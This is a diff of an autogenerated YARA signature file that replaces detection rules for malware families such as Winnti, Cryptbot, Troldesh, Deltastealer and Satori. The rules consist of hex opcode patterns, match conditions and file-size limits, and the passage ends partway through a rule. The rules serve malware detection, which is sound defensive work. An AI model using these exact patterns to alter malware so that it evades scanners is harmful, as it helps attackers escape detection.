-		$sequence_6 = { 8b7508 8bce 68b8020000 68???????? c745fc00000000 }
-		$sequence_7 = { e8???????? 83c404 c645fc12 8b45ec c745d40f000000 c745d000000000 c645c000 }
-		$sequence_8 = { 43 837e1410 7204 8b06 eb02 }
-		$sequence_9 = { 83f81d 7cf1 eb07 8b0cc544be4200 894de4 }
+		$sequence_0 = { 8365d800 c745dce7384000 a1???????? 8945e0 }
+		$sequence_1 = { 50 56 e8???????? 83c408 8b54241c 55 }
+		$sequence_2 = { 83ec4c 56 8b742454 6808020000 68???????? }
+		$sequence_3 = { ff15???????? 8b542414 56 52 ff15???????? 8b4570 }
+		$sequence_4 = { 0fb6442404 8a4c240c 8488e1eb4000 751e 837c240800 7410 }
+		$sequence_5 = { 5e c3 56 8b742408 8b06 813863736de0 751c }
+		$sequence_6 = { ff7508 83c008 e8???????? 3b4514 59 752d 837df800 }
+		$sequence_7 = { 50 8db6b4e14000 ff36 e8???????? }
+		$sequence_8 = { 83ff01 751a 8b442414 8b08 8b542408 51 }
+		$sequence_9 = { 7508 8b4508 a3???????? 5b 33c0 5f }
 
 	condition:
-		7 of them and filesize < 516096
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Winnti_Auto : FILE
+rule MALPEDIA_Win_Nimgrabber_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1351f8e3-6ca5-5a13-9678-9210d9ddffd2"
+		id = "89bd52a7-663e-548b-aa96-3fbc1c4d91ac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.winnti_auto.yar#L1-L242"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nimgrabber"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nimgrabber_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "09cc054785791e781076cf9631fef38d07059412817f6de2934895bd3887e46e"
+		logic_hash = "d088108be342ea9771cd179dc72ead263968b1a4b5039d9c99155df864322e6b"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -96121,48 +96400,34 @@ rule MALPEDIA_Win_Winnti_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 56 ff15???????? 85c0 7e79 8d4c2418 8d942484000000 }
-		$sequence_1 = { 8dbc24c4000000 8d942410010000 f3ab 668b8424740b0000 bf???????? 66898424d2050000 83c9ff }
-		$sequence_2 = { 8b734c 03f8 8bc1 c1e902 f3a5 8bc8 }
-		$sequence_3 = { f3ab 8b8c2498010000 c644242004 51 c644242501 ff15???????? }
-		$sequence_4 = { ffd7 68???????? 68???????? 89460c }
-		$sequence_5 = { 85c0 751a 8bcb 8d142e 2bce 51 }
-		$sequence_6 = { e8???????? 8b4c2418 50 6800040000 }
-		$sequence_7 = { 8bfa 83c9ff f2ae 8b54242c }
-		$sequence_8 = { 0f849a000000 4c8d5b2e 660f1f440000 410fb70b 458bca }
-		$sequence_9 = { 8b4b1c 4803cf 8b0491 4803c7 488b5c2410 }
-		$sequence_10 = { 4585d2 759d 488b7db7 458bd9 44894d97 }
-		$sequence_11 = { 4053 4883ec40 48c74424580a000000 488b442458 4c8d442458 }
-		$sequence_12 = { 4863c9 e8???????? 488bd8 4c8d443710 4983781810 7203 4d8b00 }
-		$sequence_13 = { 75f1 408830 488d542450 4038742450 }
-		$sequence_14 = { 90 488bd0 488d4b28 e8???????? 90 48837dd710 7209 }
-		$sequence_15 = { 4863d9 4c8be3 49c1fc05 4c8d355a4f0a00 83e31f 486bdb58 }
-		$sequence_16 = { 48c784248800000000000000 488d942488000000 488d4c2428 e8???????? 488d05e7700100 4889442428 488d1553d80100 }
-		$sequence_17 = { 7517 488d0513ac0a00 488b4c2430 483bc8 7406 e8???????? 90 }
-		$sequence_18 = { 7511 33c0 4881c4e0000000 415f 415e }
-		$sequence_19 = { 4889742430 488b442440 48894310 48894b18 48897c2448 }
-		$sequence_20 = { 741e 837d6001 7511 488d5568 ff15???????? 488b8d00010000 ff15???????? }
-		$sequence_21 = { 48897c2478 488b8c2400010000 4885c9 741f 4183fe01 7513 }
-		$sequence_22 = { 8bd8 85c0 7848 488b8c24b0000000 }
-		$sequence_23 = { 488d0527eb0a00 eb04 4883c010 4883c428 c3 4883ec28 e8???????? }
+		$sequence_0 = { 89e8 e8???????? 8b4310 8d68f8 85c0 0f8469feffff 8b4500 }
+		$sequence_1 = { 8b4514 89442414 83fa0f 7f5a 8b5d04 8b4500 85db }
+		$sequence_2 = { 89f8 25ff010000 0fb78446e4030000 6685c0 0f85a0090000 89f8 89fa }
+		$sequence_3 = { 8b442420 8b00 39c6 0f8256feffff 83e801 893424 89442404 }
+		$sequence_4 = { 8b44243c 8b4c2460 8d5c0808 0fb64708 3c2a 0f849b0b0000 0f87f7000000 }
+		$sequence_5 = { 8d56f8 83e808 8946f8 83f807 0f861a020000 8b4304 85c0 }
+		$sequence_6 = { 83ff01 0f8492000000 8b11 8d6ffe 39d5 7211 83ea01 }
+		$sequence_7 = { 037304 8b5208 0fb6f8 89f1 897c2440 83c42c 5b }
+		$sequence_8 = { e8???????? c1e807 83f001 83e001 e9???????? 837c24687f 0f8ea80b0000 }
+		$sequence_9 = { 037c2440 0f49c7 83c208 89542414 89c5 89c8 25ffffff3f }
 
 	condition:
-		7 of them and filesize < 1581056
+		7 of them and filesize < 1238016
 }
-rule MALPEDIA_Win_Cryptbot_Auto : FILE
+rule MALPEDIA_Win_Dyepack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c80588a6-d143-5e79-9f26-778ded8c5ced"
+		id = "07deca3f-25ed-51d0-81b9-2a80bfd3fbb4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptbot_auto.yar#L1-L256"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dyepack_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "a7dadf34e757866bd3311ff7a46036d085711fdb75a64818e7cbce0bd5b48b23"
+		logic_hash = "c761a43cdd5c317a044dbb40e0c85464d14b22fce932fc8ee9b2120e24aa5b64"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -96174,52 +96439,32 @@ rule MALPEDIA_Win_Cryptbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c0 85ed 0f94c0 8be8 }
-		$sequence_1 = { 760f b990ec0000 e8???????? e9???????? }
-		$sequence_2 = { e9???????? b949dc0000 e9???????? b944dc0000 e9???????? b964dc0000 }
-		$sequence_3 = { 7f0a 83fd1e 7f05 83ff13 }
-		$sequence_4 = { eb0c b99fed0000 e8???????? 8907 }
-		$sequence_5 = { 33c0 eb0a b917d90000 e8???????? }
-		$sequence_6 = { 7511 b9d7d80000 e8???????? 8907 }
-		$sequence_7 = { 750f b955960100 e8???????? e9???????? }
-		$sequence_8 = { 7414 3c7a 7508 8b4610 803874 7408 41 }
-		$sequence_9 = { 83caff 8bcf e8???????? 83caff }
-		$sequence_10 = { 7419 8b542408 83fa01 7c10 0fbf4846 }
-		$sequence_11 = { 744e 0fb74802 83e103 3bcb }
-		$sequence_12 = { 7508 85f6 7404 c6464101 5e c3 }
-		$sequence_13 = { 1ac9 2403 80e110 8ad1 3c02 7509 }
-		$sequence_14 = { 7505 89410c 8bc1 ffb42484000000 }
-		$sequence_15 = { 85c0 742c 8bd6 8bcb }
-		$sequence_16 = { e8???????? 8b5720 8bce e8???????? 8b5724 }
-		$sequence_17 = { 8b4d34 894c245c dd85b8fbffff dd5c2454 }
-		$sequence_18 = { 014710 83571400 83c301 8bbe4c010000 8355fc00 }
-		$sequence_19 = { 8b4d18 8901 895104 e9???????? }
-		$sequence_20 = { 015e58 8bd7 8b4e60 83565c00 }
-		$sequence_21 = { 015f28 8bc2 13472c 89472c }
-		$sequence_22 = { 8b4d14 898d38ffffff 8b8580000000 898534ffffff }
-		$sequence_23 = { 8b4d20 894c2468 8b4d5c 894c2464 }
-		$sequence_24 = { 8b4d18 8b09 81c1fc030000 8b448808 }
-		$sequence_25 = { 014e10 134614 837de000 894614 }
-		$sequence_26 = { 8b4d24 894c247c dd85b0fbffff dd5c2474 }
-		$sequence_27 = { 8b4d28 898d30ffffff 8b958c000000 89952cffffff }
-		$sequence_28 = { 018330af0100 8b45d8 85c0 7416 }
-		$sequence_29 = { 8b4d18 8b09 83c101 81c1fc030000 }
+		$sequence_0 = { eb04 8b4c2410 2bcd 1bc7 7815 }
+		$sequence_1 = { b814100000 e8???????? 53 56 57 33db b9ff030000 }
+		$sequence_2 = { 3bcb 765a eb04 8b4c2410 2bcd }
+		$sequence_3 = { 56 ff15???????? 8d442410 895c2410 50 56 }
+		$sequence_4 = { ff15???????? 56 ff15???????? 8d442410 895c2410 }
+		$sequence_5 = { 53 51 e8???????? 83c408 5d 5f }
+		$sequence_6 = { 53 aa 8b842434100000 53 6800000040 50 ff15???????? }
+		$sequence_7 = { 13fb 3bf8 7cb2 7f08 8b4c2410 3be9 }
+		$sequence_8 = { 53 56 ffd7 8b442414 8b4c2410 33ed 33ff }
+		$sequence_9 = { 7815 7f08 81f900100000 760b b900100000 895c2420 }
 
 	condition:
-		7 of them and filesize < 17138688
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Mebromi_Auto : FILE
+rule MALPEDIA_Win_Troldesh_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3d64e85a-906f-5ddb-9f75-04eb426f7ebc"
+		id = "71dc6e06-8dd4-5865-ab10-09f20ee5e07a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mebromi_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.troldesh_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "051f5b8119e90ef14be758def00ef62b697ce727969ed9523ac57414d0773faf"
+		logic_hash = "54ddaca68ab9115d35e14f6b78269f4735d8b277965f7a8b9f90608c52763a8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96233,32 +96478,32 @@ rule MALPEDIA_Win_Mebromi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5f eb26 8d4508 8db694702900 6a00 }
-		$sequence_1 = { b82c2900d8 2c29 0000 2d29008a46 0323 }
-		$sequence_2 = { 8bec 8b4508 ff348520712900 ff15???????? }
-		$sequence_3 = { eb0f 0fb6d2 f68201a0290004 7403 }
-		$sequence_4 = { 56 ffd7 3bdd 5b }
-		$sequence_5 = { 68000000c0 68???????? ff15???????? 8b3d???????? 83f8ff a3???????? 7544 }
-		$sequence_6 = { 58 c20c00 ff05???????? 833d????????01 55 56 57 }
-		$sequence_7 = { 68???????? ff742410 ff15???????? 8bf0 85f6 7416 57 }
-		$sequence_8 = { 8888009f2900 eb1f 83f861 7213 83f87a }
-		$sequence_9 = { ff742410 ff15???????? 8bf0 85f6 7416 57 56 }
+		$sequence_0 = { ffd5 85c0 755e 6a08 8d442478 50 8d44244c }
+		$sequence_1 = { e8???????? 56 57 8bf3 b8ff0f0000 c1ee0c 8bfb }
+		$sequence_2 = { ff75fc 50 e8???????? 83c40c 85c0 741a 8b4610 }
+		$sequence_3 = { e8???????? 8b3e 53 e8???????? c7839400000001000000 8b36 8b462c }
+		$sequence_4 = { e8???????? e9???????? 83f807 0f85d4000000 8bf5 e8???????? 8bf0 }
+		$sequence_5 = { e8???????? 8b4f04 51 89442418 895c241c e8???????? 83c404 }
+		$sequence_6 = { e8???????? ff750c ff7508 e8???????? 83c418 eb6d e8???????? }
+		$sequence_7 = { e8???????? 8b8c249c000000 83c40c 50 57 68???????? 53 }
+		$sequence_8 = { ff75f8 8b7070 e8???????? 8945f8 59 85c0 0f8562ffffff }
+		$sequence_9 = { e9???????? 3975f4 740b 53 e8???????? 59 85c0 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 3915776
 }
-rule MALPEDIA_Win_Buhtrap_Auto : FILE
+rule MALPEDIA_Win_Grimagent_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "05b4ba66-68ba-54c1-8d1c-18fdeb619511"
+		id = "71af2f17-8403-52ad-833c-4f34c39aa4f9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buhtrap_auto.yar#L1-L156"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grimagent_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "eac17ec81dd5c0445bcaac0e052f572182cee6f02fda0d2839f8933537f248ba"
+		logic_hash = "2bd16393ddc9027f65320f9d7195e30024d5bd5433e4f4effa16eae0aefd4e45"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96272,37 +96517,32 @@ rule MALPEDIA_Win_Buhtrap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 59 84c0 0f8435010000 }
-		$sequence_1 = { ff5010 837df000 0f84e7000000 85c0 0f85c9000000 }
-		$sequence_2 = { 8d442454 50 53 6a0a 5a e8???????? 50 }
-		$sequence_3 = { 53 ffd6 8bd8 2b5dfc 895dec }
-		$sequence_4 = { 66895dec 8bf3 8afb 8bc6 8a9c35ecfeffff }
-		$sequence_5 = { 8d4df0 51 8d4df8 51 6a01 6aff 52 }
-		$sequence_6 = { 57 ffd6 57 8945fc ffd6 59 59 }
-		$sequence_7 = { ba0a010000 b9???????? e8???????? 83ec0c be???????? }
-		$sequence_8 = { ff75f4 ff15???????? 8b45e8 5e }
-		$sequence_9 = { 8d742414 c744241401234567 c744241889abcdef c744241cfedcba98 }
-		$sequence_10 = { 8945fc 8a040a 8801 41 }
-		$sequence_11 = { c645ff00 897df8 3bdf 0f84ad010000 8b4634 }
-		$sequence_12 = { 807d1000 50 ff7508 740c }
-		$sequence_13 = { 8b4508 c7403401000000 8b45f8 3bc6 }
-		$sequence_14 = { 765c 837c241000 7655 51 e8???????? 59 }
+		$sequence_0 = { 83ec18 c745f400000000 c745f800000000 c745e800000000 8b4508 8945f0 }
+		$sequence_1 = { 8b4d0c 51 e8???????? 83c404 3945f8 7328 8b55ec }
+		$sequence_2 = { 85c0 7420 8b4d08 51 8d95f4feffff 52 e8???????? }
+		$sequence_3 = { 83c404 3945f8 750e c745e801000000 b801000000 eb1a 8b4df0 }
+		$sequence_4 = { 0f8394000000 8b4df0 0fb711 8b45fc }
+		$sequence_5 = { 8b45ec 83c002 8945ec 8b4dfc 83c102 894dfc eb02 }
+		$sequence_6 = { 85c0 7420 8b4d08 51 8d95f4feffff }
+		$sequence_7 = { 83c404 3945f8 750e c745e801000000 }
+		$sequence_8 = { 8b4508 0fbe08 85c9 7426 }
+		$sequence_9 = { 8b4508 8945f0 8b4d0c 894dfc c745f400000000 eb09 8b55f4 }
 
 	condition:
-		7 of them and filesize < 131072
+		7 of them and filesize < 582656
 }
-rule MALPEDIA_Win_Unidentified_098_Auto : FILE
+rule MALPEDIA_Win_Disk_Knight_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cee1322b-e182-5772-a21f-5cf6e6750059"
+		id = "2e5932a4-2261-529e-8603-e7381cbcd593"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_098"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_098_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disk_knight"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.disk_knight_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e8d2888b0e7d3535c791d7aba0e1785261ca562eca0e4741087a888aec2763e8"
+		logic_hash = "94d53be36645294fa895fc3e62b424a992d83f6ddb436852c2ddc8dd29bf34d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96316,32 +96556,32 @@ rule MALPEDIA_Win_Unidentified_098_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c89f1 e8???????? b901000000 4989c5 e8???????? 4989c4 0fb644244f }
-		$sequence_1 = { e9???????? 498b0424 8954244c 4c89e1 4488442440 ff5048 8b54244c }
-		$sequence_2 = { 488945b0 488b45c8 0fb64038 3c01 7423 84c0 0f849e000000 }
-		$sequence_3 = { 48397c2448 0f83b5000000 488b4310 488b5318 c644244401 4839d0 }
-		$sequence_4 = { 7426 662e0f1f840000000000 498b4c2408 4885c9 7446 4983c420 e8???????? }
-		$sequence_5 = { 4c89f7 31c0 f3aa b903000000 c744244c04010000 4989f0 4c89f2 }
-		$sequence_6 = { 4e8d0441 4c894220 4e8d0c49 4c894a30 41b900000080 4c39c8 7c1b }
-		$sequence_7 = { c744243c00000000 89442420 e8???????? b804000000 4d8d442410 488b542448 488b4c2440 }
-		$sequence_8 = { 3c20 7407 88842f39010000 488b8ba0000000 e8???????? 4885c0 0f84a6020000 }
-		$sequence_9 = { e8???????? 418b442414 83f80a 7580 0f1f00 49ff442430 49c744242800000000 }
+		$sequence_0 = { 52 8b45c8 50 ff15???????? 8945ac eb07 c745ac00000000 }
+		$sequence_1 = { 8bd0 8d4dd4 ffd6 50 68???????? ffd7 8d4d8c }
+		$sequence_2 = { ff15???????? 8bd0 8d4da0 ffd6 8d45a4 50 ff15???????? }
+		$sequence_3 = { c7458001000080 33d2 8d4db0 ff15???????? ba???????? 8d4db4 ff15???????? }
+		$sequence_4 = { 8b16 8d8578ffffff 50 56 ff92b8070000 3bc7 7d0e }
+		$sequence_5 = { 8975c8 8d4db0 ff15???????? 8b4dc8 33ff 3bcf 741c }
+		$sequence_6 = { 83bdc4feffff00 7d23 6a58 68???????? 8b8dc8feffff 51 8b95c4feffff }
+		$sequence_7 = { 8d55dc 51 52 897d80 c78578ffffff00000000 89bd70ffffff ff15???????? }
+		$sequence_8 = { 6880000000 ff15???????? 83c41c 8b4dc8 51 8d9544ffffff 52 }
+		$sequence_9 = { c785bcfeffff01000000 8b4d0c 833900 7455 8b550c 8b02 66833801 }
 
 	condition:
-		7 of them and filesize < 3345408
+		7 of them and filesize < 868352
 }
-rule MALPEDIA_Win_Hikit_Auto : FILE
+rule MALPEDIA_Win_Deltastealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cf2c2140-f351-5d9d-a962-449d1b05d24a"
+		id = "4fccefcb-7a2e-57a6-ab41-b89b24454179"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hikit_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deltastealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deltastealer_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "d51c1ae21b05f4f7340fe9215a9d683066cb3055762a66620984bf5bd09e28e0"
+		logic_hash = "8e1fc56421c67233761e9d4924d596056974746fe89cb951900a859521620234"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96355,32 +96595,32 @@ rule MALPEDIA_Win_Hikit_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b442408 39442418 0f84e8000000 c744240401000000 8b442408 89442428 8b442428 }
-		$sequence_1 = { 48 c784245001000000000000 48 c744244000000000 48 c784244801000000000000 48 }
-		$sequence_2 = { 68???????? 6a24 8b45f8 83c004 50 e8???????? 83c424 }
-		$sequence_3 = { 52 8d8c2498120000 51 33c9 03c0 8d510c }
-		$sequence_4 = { 7408 81f90c000140 7506 8988e0000000 ff7514 ff7510 51 }
-		$sequence_5 = { 0f8427020000 8d8758080000 50 ff15???????? f6460d04 7546 8b4608 }
-		$sequence_6 = { 48 03c1 48 89442440 48 8b842488010000 0fb600 }
-		$sequence_7 = { 85c0 0f8e84000000 48 8b442428 0fb7501a 48 8b4c2428 }
-		$sequence_8 = { 7e0c 48 8b442450 c6803201000000 48 8b442450 0fb68031010000 }
-		$sequence_9 = { 48 8b442420 8b5028 48 c1ea0c 48 8b442420 }
+		$sequence_0 = { eb5d 31ff eb18 48314618 4889f1 e8???????? 488b4638 }
+		$sequence_1 = { 4d89d7 40b601 83ff01 0f8583000000 4181fcff000000 0f873c050000 4885db }
+		$sequence_2 = { e8???????? 8a5860 4889f9 e8???????? 448a7060 4889f9 e8???????? }
+		$sequence_3 = { c3 4d89c8 e8???????? 0f0b 4157 4156 4155 }
+		$sequence_4 = { e8???????? 4889f9 89ea e8???????? 41c60707 4883c438 5b }
+		$sequence_5 = { 498b4e28 498b5630 41c60709 41c7471802000000 e8???????? 90 4883c438 }
+		$sequence_6 = { eb18 488b4e40 4883c118 e8???????? e8???????? 488906 895608 }
+		$sequence_7 = { e8???????? 0f0b ba08000000 4889f0 4883c420 5b 5f }
+		$sequence_8 = { e8???????? 4829fe 4c89f1 4889f2 4883c428 5b 5f }
+		$sequence_9 = { 8b90cc000000 895108 83a0c400000000 e8???????? c70701000000 894704 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 3532800
 }
-rule MALPEDIA_Win_Nachocheese_Auto : FILE
+rule MALPEDIA_Elf_Satori_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0d1d5a3a-67ce-5c34-82de-43ee9a1b9d3b"
+		id = "2284f03a-322c-58c3-b1d9-fcae207127e0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nachocheese"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nachocheese_auto.yar#L1-L158"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.satori_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "cb72c9411818be36907dbdd85a36216d8cf0f5bc33a5604f0609af1c56f21889"
+		logic_hash = "62c626f34e857ae6d027e483d640bb517fea648ca7b95f5f7c3238608cc58884"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96394,38 +96634,32 @@ rule MALPEDIA_Win_Nachocheese_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bfa 8d47fd 3901 8901 }
-		$sequence_1 = { 3d2cc00000 7f18 3d2bc00000 7d1b }
-		$sequence_2 = { 33c4 89842498210000 833d????????02 53 56 }
-		$sequence_3 = { 3d9c000000 7c07 3d9f000000 7e0d }
-		$sequence_4 = { 8b5f18 85f6 7504 33c0 eb1e }
-		$sequence_5 = { 83c404 8975fc 8d4900 e8???????? 8bf0 85f6 }
-		$sequence_6 = { 8d4813 894dec 8955fc 53 }
-		$sequence_7 = { 3d2bc00000 7d1b 3d9c000000 7c07 }
-		$sequence_8 = { 81fb80000000 7305 83c302 eb29 81fb00010000 7305 }
-		$sequence_9 = { 5b 8be5 5d c20400 8d4508 50 681d002000 }
-		$sequence_10 = { 33c8 894710 8b4708 33c1 }
-		$sequence_11 = { 33c0 c3 05d13fffff 83f801 }
-		$sequence_12 = { 83ec0c 53 56 57 33f6 6a03 }
-		$sequence_13 = { 8b4508 8d55a8 52 33c9 50 }
-		$sequence_14 = { 52 89bddcf9ffff e8???????? 83c404 }
-		$sequence_15 = { 3d9f000000 7e0d 33c0 c3 }
+		$sequence_0 = { 75f0 83ec0c ebcd 8d65f8 5b 5e }
+		$sequence_1 = { c7411849260508 eb28 83f83e 7509 c7411851260508 eb1a 83f82a }
+		$sequence_2 = { 50 e8???????? 83c410 eb22 50 55 }
+		$sequence_3 = { 894304 e8???????? a1???????? 66897308 c7430c00000000 c6430aff 89580c }
+		$sequence_4 = { 0fb7c0 894704 8b441108 66c1c808 }
+		$sequence_5 = { e9???????? 0fbe19 b800000080 41 c744240801000000 eb12 }
+		$sequence_6 = { e8???????? 89e8 c7851c040000ffffffff e8???????? 83c410 e9???????? }
+		$sequence_7 = { 80cc08 50 6a04 ff35???????? e8???????? 8d842468090000 }
+		$sequence_8 = { 41 eb9b 85ed 790f }
+		$sequence_9 = { 83c410 807b021f 742c 8d143b 8a02 3cfd 7404 }
 
 	condition:
-		7 of them and filesize < 1064960
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Mapiget_Auto : FILE
+rule MALPEDIA_Win_Session_Manager_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "90931f84-8d97-5d03-9fd8-5157c4363161"
+		id = "0581ea0a-3bb4-5759-b879-c839f5bdbdad"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mapiget_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.session_manager_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "db2ad0ac6ed98d9fe4028516eb88a6adb15c290b65682d6ffe66f99e185c09f3"
+		logic_hash = "02f9d1668e1984de7209fb8203b706bf8fb13f2ad60ed57c78494704eeede860"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96439,32 +96673,32 @@ rule MALPEDIA_Win_Mapiget_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 7433 8305????????20 8d0cbd20174100 8d9000010000 }
-		$sequence_1 = { 50 51 52 c744244044000000 c744244808e24000 c744246c01000000 ff15???????? }
-		$sequence_2 = { b97f000000 33c0 8d7c242a 66895c2428 66899c2428020000 }
-		$sequence_3 = { 8d7c2418 8b542468 f3ab 6689442444 8d442404 8d4c2414 50 }
-		$sequence_4 = { 8b4c2468 6a00 6a00 6a00 52 }
-		$sequence_5 = { 8d85f0feffff 52 8d8d70ffffff 50 8d95f0fdffff 51 }
-		$sequence_6 = { 6683bc45eefeffff0a 7517 8d95f0feffff 52 }
-		$sequence_7 = { c1e603 8d1c8520174100 8b048520174100 03c6 }
-		$sequence_8 = { 8b5c2408 55 83cdff 56 83fb02 57 be01000000 }
-		$sequence_9 = { 50 e8???????? 83c404 6689bc456effffff 8d8df0feffff }
+		$sequence_0 = { 488bca 4c8d0579970100 83e13f 488bc2 }
+		$sequence_1 = { 4c89b8701c0000 4c89b8781c0000 4c89b8801c0000 4c89b8881c0000 4c89b8901c0000 4c89b8981c0000 4c89b8a01c0000 }
+		$sequence_2 = { 4c89b8c01a0000 4c89b8c81a0000 4c89b8d01a0000 4c89b8d81a0000 4c89b8e01a0000 4c89b8e81a0000 }
+		$sequence_3 = { 0f84d6000000 4c8d155b7e0100 41b90a000000 4b8b04fa }
+		$sequence_4 = { 4c89b8981d0000 4c89b8a01d0000 4c89b8a81d0000 4c89b8b01d0000 4c89b8b81d0000 4c89b8c01d0000 }
+		$sequence_5 = { 488b45d8 488908 488d0d6d720100 488b45d8 8990a8030000 488b45d8 48898888000000 }
+		$sequence_6 = { 4c89b850130000 4c89b858130000 4c89b860130000 4c89b868130000 }
+		$sequence_7 = { 90 4c8d4001 41b901000000 488d1592df0100 488d4dd7 e8???????? }
+		$sequence_8 = { 488d1559e10100 488bcf ff5018 48c7452f0f000000 48897527 }
